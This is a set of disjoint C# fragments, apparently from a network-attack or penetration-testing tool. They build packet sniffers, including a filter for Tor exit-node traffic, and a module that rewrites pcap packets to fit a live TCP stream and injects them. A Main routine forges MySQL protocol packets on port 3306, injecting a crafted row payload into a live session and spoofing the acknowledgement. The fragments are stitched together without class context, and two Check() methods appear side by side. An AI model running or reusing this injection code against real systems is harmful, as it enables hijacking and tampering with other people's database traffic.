void Inject(NetworkSniffer sniffer, TcpStream stream, Packet[] packets)
{
WriteInfo("Injecting packets");
foreach (EthernetPacket p in packets)
{
// Override ethernet
p.DestinationHwAddress = stream.DestinationHwAddress;
p.SourceHwAddress = stream.SourceHwAddress;
p.UpdateCalculatedValues();
IpPacket ip = (IpPacket)p.PayloadPacket;
ip.SourceAddress = stream.Source.Address;
ip.DestinationAddress = stream.Destination.Address;
ip.UpdateCalculatedValues();
if (ip.Protocol != IPProtocolType.TCP)
{
continue;
}
TcpPacket tcp = (TcpPacket)ip.PayloadPacket;
tcp.SourcePort = (ushort)stream.Source.Port;
tcp.DestinationPort = (ushort)stream.Destination.Port;
tcp.UpdateCalculatedValues();
// Send
sniffer.Send(p);
}
}
public override ECheck Check()
{
NetworkSniffer s = null;
try
{
//if (!SystemHelper.IsAdministrator())
// WriteError("Require admin rights");
IPayloadSniffer pay = (IPayloadSniffer)Payload;
if (!pay.Check())
{
return(ECheck.Error);
}
s = new NetworkSniffer(Interface);
s.Start();
return(ECheck.Ok);
}
catch { return(ECheck.Error); }
finally
{
if (s != null)
{
s.Dispose();
}
}
}
public override ECheck Check()
{
NetworkSniffer s = null;
try
{
if (!SystemHelper.IsAdministrator())
{
WriteError("Require admin rights");
}
if (!DumpFolder.Exists)
{
WriteError("DumpFolder must exists");
return(ECheck.Error);
}
s = new NetworkSniffer(LocalAddress);
s.Filter = new SnifferPortFilter(this.LocalPort);
s.Start();
return(ECheck.Ok);
}
catch { return(ECheck.Error); }
finally
{
if (s != null)
{
s.Dispose();
}
}
}
public override bool Run()
{
IPayloadSniffer pay = (IPayloadSniffer)Payload;
//if (!SystemHelper.IsAdministrator())
// WriteError("Require admin rights");
if (!pay.Check())
{
return(false);
}
if (FilterOnlyTorRequest)
{
TorHelper.UpdateTorExitNodeList(true);
}
NetworkSniffer s = new NetworkSniffer(Interface)
{
Timeout = TcpTimeout,
TimeoutSync = TcpTimeoutSync
};
s.StartTcpStreamMethod = StartTcpStreamMethod;
s.OnDequeue += pay.Dequeue;
if (!string.IsNullOrEmpty(Filter))
{
s.Filter = Filter;
}
if (pay.CaptureOnTcpStream)
{
s.OnTcpStream += pay.OnTcpStream;
}
if (pay.CaptureOnPacket)
{
s.OnPacket += pay.OnPacket;
}
List <IIpPacketFilter> filters = new List <IIpPacketFilter>();
if (FilterOnlyTorRequest)
{
filters.Add(new SnifferTorFilter());
}
if (FilterPorts != null && FilterPorts.Length > 0)
{
filters.Add(new SnifferPortFilter(FilterPorts));
}
if (FilterProtocols != null && FilterProtocols.Length > 0)
{
filters.Add(new SnifferProtocolFilter(FilterProtocols));
}
s.Filters = filters.ToArray();
s.OnCaptureStop += S_OnCaptureStop;
s.Start();
CreateJob(s, "IsDisposed");
return(true);
}
public bool Check()
{
packets = NetworkSniffer.ReadAllPacketsFromPcap(SendPcap.FullName).Where(u => u is EthernetPacket).Cast <EthernetPacket>().ToArray();
if (packets != null && packets.Length > 0)
{
WriteInfo("Packets for injection", packets.Length.ToString(), System.ConsoleColor.Cyan);
return(true);
}
WriteInfo("Not packet found");
return(false);
}
static void Main(string[] args)
{
// Creamos el sniffer, que capturará el puerto 3306 en tcp
using (NetworkSniffer ns = new NetworkSniffer("Ethernet"))
{
ns.Filter = "tcp";
ns.Filters = new IIpPacketFilter[] { new SnifferPortFilter(3306) };
ns.OnPacket += Ns_OnPacket;
ns.Start();
Console.WriteLine("Press any key for exit");
Console.ReadKey();
}
}
public override bool Run()
{
if (!SystemHelper.IsAdministrator())
{
WriteError("Require admin rights");
}
if (!DumpFolder.Exists)
{
return(false);
}
NetworkSniffer s = new NetworkSniffer(LocalAddress);
s.OnTcpStream += s_OnTcpStream;
s.Filter = new SnifferPortFilter(this.LocalPort);
s.Start();
CreateJob(s);
return(true);
}
static void Ns_OnPacket(object sender, IPProtocolType protocolType, EthernetPacket packet)
{
NetworkSniffer ns = (NetworkSniffer)sender;
IPv4Packet ip = (IPv4Packet)packet.PayloadPacket;
TcpPacket t = (TcpPacket)ip.PayloadPacket;
// Si el paquete recibido es el de respuesta OK del mysql
if (t.PayloadData.SequenceEqual(ResponseOk))
{
Parent = packet;
// Replicamos el paquete, enviando el payload de la fila, si, antes de recibir el SELECT
LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length);
ip.Id++;
t.SequenceNumber = LastSequenceId;
t.OptionsCollection.Clear();
t.PayloadData = Payload;
t.Ack = true;
t.Psh = true;
ip.UpdateCalculatedValues();
t.UpdateCalculatedValues();
ip.UpdateIPChecksum();
t.UpdateTCPChecksum();
ns.Send(packet);
LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length);
Console.WriteLine(t.ToString(StringOutputType.Verbose));
}
else
{
// Si el paquete contiene el valor SELECT
string ascii = Encoding.ASCII.GetString(t.PayloadData);
if (Parent != null && ascii.Contains("SELECT"))
{
// Ya no actuamos mas
ns.OnPacket -= Ns_OnPacket;
ip = (IPv4Packet)Parent.PayloadPacket;
t = (TcpPacket)ip.PayloadPacket;
// Enviamos un ACK del paquete recibido, para darle por bueno
t.SequenceNumber = LastSequenceId;
t.AcknowledgmentNumber = t.AcknowledgmentNumber;
t.PayloadData = new byte[] { };
ip.Id++;
t.Ack = true;
t.Psh = false;
ip.UpdateCalculatedValues();
t.UpdateCalculatedValues();
ip.UpdateIPChecksum();
t.UpdateTCPChecksum();
ns.Send(packet);
Console.WriteLine(t.ToString(StringOutputType.Verbose));
}
}
}
